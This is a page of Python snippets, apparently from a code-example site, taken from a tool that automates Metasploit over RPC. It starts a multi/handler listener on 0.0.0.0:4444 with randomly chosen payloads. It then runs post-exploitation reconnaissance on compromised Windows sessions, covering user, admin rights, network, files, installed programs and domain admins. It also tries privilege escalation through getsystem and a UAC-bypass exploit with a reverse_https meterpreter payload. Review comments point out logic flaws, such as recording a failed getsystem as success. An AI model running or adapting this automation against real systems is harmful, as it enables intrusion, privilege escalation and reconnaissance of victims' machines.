Esempio n. 1
def deleteSessions():
    """Remove every stored Session, EscalationData and Recon document.

    The deletes are unconditional and unfiltered, so all previously collected
    data is lost. The only caller visible here runs this at start-up.
    """
    # Same order as before: sessions, then escalation records, then recon data.
    for collection in (Session, EscalationData, Recon):
        collection.objects().delete()
    
    
Esempio n. 2
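 def gatherWhoAmI(self, msfclient, sessionInput):
     """Run ``whoami`` in a session and store the result on its Recon document.

     Args:
         msfclient: object exposing ``client`` (used for sessions and consoles)
             and ``console`` (a console id).
         sessionInput: session id as a string; it is concatenated into event
             text and interpolated into the console kill command below.

     Returns:
         None. If no ``Session`` document matches ``sessionInput`` the result
         is logged and nothing is saved. Previously that case reached
         ``recon.save()`` with ``recon`` unbound, and the error was swallowed
         by the generic handler.
     """
     EventUtils.settingEvent(self, "Gathering whoami data from session " + sessionInput +".")
     try:
         whoami = msfclient.client.sessions.session(sessionInput).run_psh_cmd("whoami", timeout=30)
         session = Session.objects(_id=sessionInput).first()
         if not session:
             logger.info("No stored session with id %s; whoami result not saved.", sessionInput)
             return

         output_lines = whoami.splitlines()
         non_empty = [entry for entry in output_lines if entry != '']

         recon = Recon.objects(session_id=sessionInput).first()
         if recon:
             # An existing record has always been updated from the second
             # output line; fall back to the last non-empty line instead of
             # raising IndexError when the output is shorter than that.
             if len(output_lines) > 1:
                 recon.whoami = output_lines[1]
             elif non_empty:
                 recon.whoami = non_empty[-1]
         else:
             recon = Recon()
             recon.session_id = sessionInput
             recon._id = sessionInput
             session.recon_id.append(recon.session_id)
             # A new record takes the last non-empty output line.
             if non_empty:
                 recon.whoami = non_empty[-1]

         recon.save()
         session.save()
         EventUtils.settingEvent(self, "whoami data for session " +sessionInput+ ": " +recon.whoami+".")
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         # NOTE(review): sessionInput is written verbatim into a console
         # command; confirm callers only ever pass a numeric session id.
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)
     except Exception as msg:
         # Best-effort step: log the failure and carry on.
         logger.info(msg)
         print("There was an error!")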
Esempio n. 3
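 def gatherCurrentAdmin(self, msfclient, sessionInput):
     """Record on the Recon document whether ``net sessions`` was refused.

     The command output is searched for the text ``Access is denied.``. If it
     appears on any line the session is stored as non-admin, otherwise as
     admin. The old per-line loop kept only the verdict of the final line, so
     a denial followed by a blank or unrelated line was stored as admin.

     Args:
         msfclient: object exposing ``client`` and ``console`` (a console id).
         sessionInput: session id as a string.

     Returns:
         None. Empty output leaves ``isAdmin`` untouched. A session id with no
         stored ``Session`` document is reported as an event and skipped
         (previously an unbound ``recon`` raised out of this method).
     """
     EventUtils.settingEvent(self, "Gathering current admin on session " + sessionInput + ".")
     try:
         admin = msfclient.client.sessions.session(sessionInput).run_psh_cmd("net sessions", timeout=30)
         session = Session.objects(_id=sessionInput).first()
         if not session:
             EventUtils.settingEvent(self, "Session " + sessionInput + " has no stored record; admin check not saved.")
             return

         recon = Recon.objects(session_id=sessionInput).first()
         if not recon:
             recon = Recon()
             recon.session_id = sessionInput
             recon._id = sessionInput
             session.recon_id.append(recon.session_id)

         output_lines = admin.splitlines()
         if output_lines:
             # NOTE(review): any output without the denial text counts as
             # admin, including unrelated error text; confirm this is acceptable.
             denied = any('Access is denied.' in entry for entry in output_lines)
             recon.isAdmin = not denied
             # One event per check (the old code emitted one per output line,
             # and only for newly created records).
             if denied:
                 EventUtils.settingEvent(self, "Session "+sessionInput+" is not admin.")
             else:
                 EventUtils.settingEvent(self, "Session "+sessionInput+" is admin.")

         recon.save()
         session.save()
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         # NOTE(review): sessionInput is written verbatim into a console
         # command; confirm callers only ever pass a numeric session id.
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)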
Esempio n. 4
    def __init__(self, msfclient):
        """Initialise storage, connect ``msfclient`` and start the session controller.

        Order matters: the database is initialised and wiped first, then the
        client is connected. If no Session documents exist after
        ``sessionPrint()``, a ``exploit/multi/handler`` listener is started
        before the controller runs.

        Args:
            msfclient: object exposing ``connect()`` and ``client``; stored on
                ``self.msfclient``.
        """
        self.msfclient = msfclient
        # Initialise the database layer (the original comment says this starts mongo).
        global_init()
        # Wipe stored session data from earlier runs. This happens before the
        # connection check below, so a failed connect still loses old data.
        svc.deleteSessions()

        print("[!]Starting Automation...")
        EventUtils.settingEvent(self, "Starting automation!")
        msfrpcdHandler()
        if self.msfclient.connect() is False:
            # NOTE(review): sys.exit() with no argument exits with status 0, so a
            # failed connection looks like success to a calling script.
            sys.exit()
        
        sessionMod(self.msfclient).sessionPrint() # NEED TO IMPROVE THIS

        session = Session.objects()
        if session:
            sessionMod(self.msfclient).activeSessionController()
        else:
            print("[!]Running exploit: exploit/multi/handler")
            exploit = self.msfclient.client.modules.use('exploit', 'exploit/multi/handler')
            time.sleep(5)
            exploit['ExitOnSession'] = False
            time.sleep(2)
            # choose_payload is read from self but not assigned in this method;
            # presumably a class-level list of payload names (confirm).
            randomPayload = random.choice(self.choose_payload)
            print("[!]Using payload: ", randomPayload)
            _payload = self.msfclient.client.modules.use('payload', randomPayload)
            time.sleep(2)
            # NOTE(review): 0.0.0.0 is the wildcard address, so the listener is
            # presumably reachable on every interface of this host. For lab use,
            # bind to the one interface that should be reachable.
            _payload['LHOST'] = '0.0.0.0'
            _payload['LPORT'] = '4444'
            time.sleep(5)
            exploit.execute(payload=_payload)
            print("[!]Executing exploit on port ", _payload['LPORT'])
            # Fixed wait before the controller runs; nothing here checks that a
            # session actually arrived.
            time.sleep(10)
            sessionMod(self.msfclient).activeSessionController()
Esempio n. 5
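def checkDisconnected(dictionary):
    '''
    Flag stored sessions that are missing from the live session mapping.

    dictionary: mapping of currently connected sessions. Its keys are assumed
        to be the same ids held in the module-level ``session_list`` (confirm
        that both use the same type, e.g. str). ``None`` or an empty mapping
        means no session is connected.

    Every id in ``session_list`` that is not a key of ``dictionary`` gets
    ``isDisconnected = True`` on its Session document. The previous test,
    ``s_id not in dictionary.items()``, compared an id with (key, value)
    pairs. It was therefore always true and flagged every session.
    '''
    if not session_list:
        return

    live_sessions = dictionary or {}
    for s_id in session_list:
        if s_id in live_sessions:
            continue
        session = Session.objects(_id=s_id).first()
        if session is None:
            # Tracked id with no stored document: nothing to flag.
            continue
        session.isDisconnected = True
        session.save()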
Esempio n. 6
    def gatherFiles(self, msfclient, sessionInput):
        """List the session's current directory and merge it into stored Recon data.

        Runs ``ls`` in the session and parses each output line with
        ``self.parseFileData``. Each parsed row is zipped with ``desc_files``
        and stored on the directory entries of every Recon document that has a
        directory named like this session's ``recon.pwd``. Directories already
        marked ``gathered`` are diffed by file name instead of refilled.

        Args:
            msfclient: object exposing ``client`` and ``console`` (a console id).
            sessionInput: session id as a string.
        """
        EventUtils.settingEvent(self, "Gathering file info from session " + sessionInput + ".")
        try:
            # Column names zipped with each parsed row; index 6 ('Name') is the
            # key used for the comparison further down.
            desc_files = ['Mode', 'Size', 'Type', 'Last', 'Modified', 'TimeZone', 'Name']
            listofFiles = msfclient.client.sessions.session(sessionInput).run_with_output('ls', timeout=30).splitlines()
            session = Session.objects(_id=sessionInput).first()
            if session:
                recon = Recon.objects(_id=sessionInput).first()
                if not recon:
                    # No recon record yet: gather the working directory first, then reload.
                    Reconnaissance.gatherPWD(self, msfclient, sessionInput)
                    recon = Recon.objects(_id=sessionInput).first()
                # NOTE(review): if recon is still None here, recon.pwd raises
                # AttributeError, which the generic handler below only logs.
                # NOTE(review): the filter is not limited to this session, and the
                # inner loop visits every directory entry of each matching
                # document, not only the one whose name matched. Confirm that
                # this is intended.
                directory = Recon.objects().filter(directory__dir_name=recon.pwd)
                if directory:
                    for r in directory:
                        for d in r.directory:
                            if not d.gathered:
                                # First pass for this directory: store every parsed row.
                                d.gathered = True
                                for f in listofFiles:
                                    file = self.parseFileData(f)
                                    if not file:
                                        pass
                                    else:
                                        files_mapped = dict(zip(desc_files, file))
                                        d.files.append(files_mapped)
                                r.save()
                            else:
                                # Later passes: compare against the names already stored.
                                current_files = []
                                for _dict in d.files:
                                    current_files.append(_dict['Name'])
                                for f in listofFiles:
                                    file = self.parseFileData(f)
                                    if not file:
                                        pass
                                    else:
                                        # Known name: hand both versions to checkingFileChanges.
                                        # current_files is not refreshed inside this loop.
                                        if file[6] in current_files:
                                            for found_dict in d.files:
                                                if file[6]==found_dict['Name']:
                                                    self.checkingFileChanges(file, found_dict)
                                                else:
                                                    pass
                                        else:
                                        # Unknown name: store it as a new entry.
                                            files_mapped = dict(zip(desc_files, file))
                                            d.files.append(files_mapped)

                            # Runs once per directory entry, on both branches above.
                            r.save()
        except MsfError:
            print(f"[!]Session {sessionInput} threw timeout error.")
            print("[!]Killing session...")
            # NOTE(review): sessionInput is written verbatim into a console
            # command; confirm callers only ever pass a numeric session id.
            msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
            time.sleep(10)
            pass
        except Exception as msg:
            # Best-effort step: any other failure is logged and printed, not raised.
            logger.info(msg)
            print(msg)
            pass
Esempio n. 7
 def gatherDomain(self, msfclient, sessionInput):
     """Run two domain-enumeration post modules and parse their console output.

     The first module's output is scanned for ``Domain: `` and ``Controller: ``
     lines. The second module's output is scanned for lines containing the
     parsed domain name. See the NOTE(review) comments: as written, the parsed
     values do not reach the saved Recon document.

     Args:
         msfclient: object exposing ``client`` and ``console`` (a console id).
         sessionInput: session id as a string.
     """
     try:
         EventUtils.settingEvent(self, "Gathering domain info from session " + sessionInput + ".")
         domain = ""
         # Placeholder values, overwritten when a "Controller: " line is parsed.
         user_list = {'User': '******', 'IP': '0.0.0.0'}
         domain_user = []
         post = msfclient.client.modules.use('post', 'windows/gather/enum_domain')
         post['SESSION'] = sessionInput
         cid = msfclient.console
         run_enum_domain = msfclient.client.consoles.console(cid).run_module_with_output(post)
         for line in run_enum_domain.splitlines():
             if '[-]' in line:
                 print("[-] Issue gathering domain info!")
             else:
                 if line.find("Domain: ") != -1:
                     domain = line.split("Domain: ",1)[1]
                 elif line.find("Controller: ") != -1:
                     # Takes the first and third whitespace-separated tokens after
                     # "Controller: "; a shorter line raises IndexError, which the
                     # generic handler below prints.
                     domain_user_info = line.split("Controller: ", 1)[1].split()
                     user_list['User'] = domain_user_info[0].upper()
                     user_list['IP'] = domain_user_info[2].replace(')', '')
                 else:
                     # Every other output line, including blank ones, lands here.
                     print("[-] Issue gathering domain info!")
         post = msfclient.client.modules.use('post', 'windows/gather/enum_domain_group_users')
         post['GROUP'] = 'domain admins'
         post['SESSION'] = sessionInput
         # NOTE(review): this call uses msfclient.consoles, while the call above
         # uses msfclient.client.consoles. Confirm that the wrapper has a
         # `consoles` attribute; if it does not, the AttributeError is printed
         # by the generic handler and nothing below runs.
         run_enum_domain_group_users = msfclient.consoles.console(cid).run_module_with_output(post)
         for line in run_enum_domain_group_users.splitlines():
             # NOTE(review): when no domain was parsed, `domain` is "" and this
             # test is true for every line; the split below then raises
             # IndexError on any line without a backslash.
             if domain in line:
                 users = line.split('\\')[1]
                 if 'not' in users:
                     pass
                 else:
                     domain_user.append(users)
         session = Session.objects(_id=sessionInput).first()
         if session:
             recon = Recon.objects(_id=sessionInput).first()
             if recon is None:
                 recon = Recon()
                 # NOTE(review): recon_domain is filled in but never attached to
                 # recon, and an existing recon is left unchanged, so the parsed
                 # domain data is not persisted.
                 recon_domain = ReconDomain()
                 recon_domain.domain = domain
                 recon_domain.domain_controller = user_list
                 recon_domain.domain_user = domain_user
         # NOTE(review): recon is unbound when no session document was found; the
         # resulting error is printed by the generic handler below.
         recon.save()
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         # NOTE(review): sessionInput is written verbatim into a console command;
         # confirm callers only ever pass a numeric session id.
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)
         pass
     except Exception as msg:
         # Best-effort step: any other failure is printed, not raised.
         print(msg)
Esempio n. 8
 def getElevated(self, msfclient, sessionInput):
     """Attempt privilege escalation on a session and record the attempt.

     A session that already has an EscalationData document is reported as
     owned and left alone. Otherwise ``getsystem`` is run in the session. If
     its first output line contains ``[-]``, a local UAC-bypass module is
     launched with a new payload. A new EscalationData document is saved
     either way.

     Args:
         msfclient: object exposing ``client``.
         sessionInput: session id as a string; converted with ``int()`` for
             the module's SESSION option.
     """
     try:
         EventUtils.settingEvent(
             self, "Trying to get elevated on session" + sessionInput + ".")
         session = Session.objects(_id=sessionInput).first()
         if session:
             # Existence of an EscalationData document is the only evidence
             # used here; the session itself is not re-checked.
             esc = EscalationData.objects(_id=sessionInput).first()
             if esc:
                 EventUtils.settingEvent(
                     self,
                     "[" + sessionInput + "] You currently own the system.")
                 print("[!]You own the system.")
             else:
                 EventUtils.settingEvent(
                     self, "[" + sessionInput +
                     "] Attempting to elevate via getsystem...")
                 esc = EscalationData()
                 getsystem = msfclient.client.sessions.session(
                     sessionInput).run_with_output(
                         'getsystem').splitlines()
                 # NOTE(review): empty output makes getsystem[0] raise IndexError,
                 # which the generic handler below only prints.
                 if '[-]' in getsystem[0]:
                     EventUtils.settingEvent(
                         self, "[" + sessionInput +
                         "] Attempting bypassuac_comijack...")
                     print(
                         "[!]Failed getsystem. Trying bypassuac_comijack..."
                     )
                     exploit = msfclient.client.modules.use(
                         'exploit',
                         'exploit/windows/local/bypassuac_comhijack')
                     exploit['SESSION'] = int(sessionInput)
                     payload = msfclient.client.modules.use(
                         'payload', 'windows/x64/meterpreter/reverse_https')
                     # NOTE(review): hard-coded wildcard address and port, as in
                     # the handler setup elsewhere on this page.
                     payload['LHOST'] = "0.0.0.0"
                     payload['LPORT'] = 4444
                     exploit.execute(payload=payload)
                     # NOTE(review): getsystem is recorded as True although this
                     # branch runs because getsystem failed, and the result of
                     # the follow-up module is never inspected. The stored
                     # record overstates what was achieved.
                     esc.getsystem = True
                     session.esc_id.append(esc._id)
                 else:
                     EventUtils.settingEvent(
                         self, "[" + sessionInput +
                         "] You currently own the system.")
                     print("[+]Gained system. Start gaining info")
                     # NOTE(review): esc._id is read without being assigned in
                     # this method; confirm the model supplies a default.
                     session.esc_id.append(esc._id)
                     esc.getsystem = True
                 esc.save()
                 session.save()
     except Exception as msg:
         # Best-effort step: every failure is printed, not raised.
         print(msg)
         pass
Esempio n. 9
 def gatherInstalledPrograms(self, msfclient, sessionInput):
     """Run the application-enumeration post module and store parsed rows on Recon.

     The module is started by writing to the session. After a fixed ten-second
     wait, whatever the session returns from ``read()`` is parsed line by line
     with ``self.parseProgramList``.

     Args:
         msfclient: object exposing ``client`` and ``console`` (a console id).
         sessionInput: session id as a string.
     """
     try:
         EventUtils.settingEvent(self, "Gathering installed program info from session " + sessionInput +".")
         # Column names zipped with each parsed row.
         program_desc = ['Name', 'Version']
         # Assigned but not used in this method.
         current_programs = []
         session = Session.objects(_id=sessionInput).first()
         msfclient.client.sessions.session(sessionInput).write('run post/windows/gather/enum_applications')
         # Fixed wait; output still being produced after it is not read.
         time.sleep(10)
         run_post = msfclient.client.sessions.session(sessionInput).read()
         listofPrograms = run_post.splitlines()
         if session:
             recon = Recon.objects(_id=sessionInput).first()
             if recon is None:
                 # NOTE(review): a new record gets no program rows at all, yet
                 # gathered_programs is set to True below.
                 recon = Recon()
                 recon._id = sessionInput
                 recon.session_id = sessionInput
                 session.recon_id.append(recon.session_id)
             else:
                 for p in listofPrograms:
                     program = self.parseProgramList(p)
                     if not program:
                         pass
                     else:
                         programs_mapped = dict(zip(program_desc, program))
                         if not recon.gathered_programs:
                             recon.installedprg.append(programs_mapped)
                         else:
                             # NOTE(review): this compares key names ('Name',
                             # 'Version'), not values. A full row is therefore
                             # never treated as new, and a short row can be
                             # appended several times. The list is also
                             # appended to while it is being iterated, and the
                             # loop variable shadows the builtin `list`.
                             for list in recon.installedprg:
                                 for key, value in list.items():
                                     if key in programs_mapped:
                                         pass
                                     else:
                                         recon.installedprg.append(programs_mapped)
             recon.gathered_programs = True
         # NOTE(review): recon is unbound when no session document was found, and
         # session is then None; the error is logged by the generic handler below.
         recon.save()
         session.save()
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         # NOTE(review): sessionInput is written verbatim into a console command;
         # confirm callers only ever pass a numeric session id.
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)
         pass
     except Exception as msg:
         # Best-effort step: any other failure is logged and printed, not raised.
         logger.info(msg)
         print(msg)
         pass
Esempio n. 10
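 def gatherNetwork(self, msfclient, sessionInput):
     """Run ``ipconfig /all`` in a session and parse the output onto its Recon document.

     Args:
         msfclient: object exposing ``client`` and ``console`` (a console id).
         sessionInput: session id as a string.

     Returns:
         None. A session id with no stored ``Session`` document is reported as
         an event and skipped before any command is run. Previously the
         command ran and ``recon.save()`` then failed on an unbound ``recon``,
         an error this method does not catch.
     """
     EventUtils.settingEvent(self, "Gathering network info on session " + sessionInput + ".")
     try:
         session = Session.objects(_id=sessionInput).first()
         if not session:
             EventUtils.settingEvent(self, "Session " + sessionInput + " has no stored record; network info not gathered.")
             return

         ip = msfclient.client.sessions.session(sessionInput).run_psh_cmd("ipconfig /all", timeout=30)

         recon = Recon.objects(session_id=sessionInput).first()
         if not recon:
             # First recon data for this session: create the record and link it.
             recon = Recon()
             recon.session_id = sessionInput
             recon._id = sessionInput
             session.recon_id.append(recon.session_id)
         self.parseIPData(recon, ip)

         recon.save()
         session.save()
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         # NOTE(review): sessionInput is written verbatim into a console
         # command; confirm callers only ever pass a numeric session id.
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)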
Esempio n. 11
 def gatherPWD(self, msfclient, sessionInput):
     """Store the session's working directory on its Recon document.

     Runs ``pwd`` in the session. A new Recon record, or an existing one whose
     stored ``pwd`` differs from the output, gets the new value and a
     ``ReconFiles`` entry named after it.

     Args:
         msfclient: object exposing ``client`` and ``console`` (a console id).
         sessionInput: session id as a string.
     """
     EventUtils.settingEvent(self, "Gathering pwd from session " + sessionInput + ".")
     try:
         current_pwd = msfclient.client.sessions.session(sessionInput).run_with_output('pwd', timeout=30)
         session = Session.objects(_id=sessionInput).first()
         if session:
             recon = Recon.objects(session_id=sessionInput).first()
             created = not recon
             if created:
                 recon = Recon()
                 recon.session_id = sessionInput
                 recon._id = sessionInput
                 session.recon_id.append(recon.session_id)
             # An existing record is touched only when the directory changed.
             if created or recon.pwd != current_pwd:
                 recon.pwd = current_pwd
                 dir_entry = ReconFiles()
                 dir_entry.dir_name = current_pwd
                 recon.directory.append(dir_entry)
         # Still outside the session check: with no stored session this raises
         # on the unbound name, and the generic handler below logs it.
         recon.save()
         session.save()
     except MsfError:
         print(f"[!]Session {sessionInput} threw timeout error.")
         print("[!]Killing session...")
         msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
         time.sleep(10)
     except Exception as msg:
         logger.info(msg)
         print("There was an error!")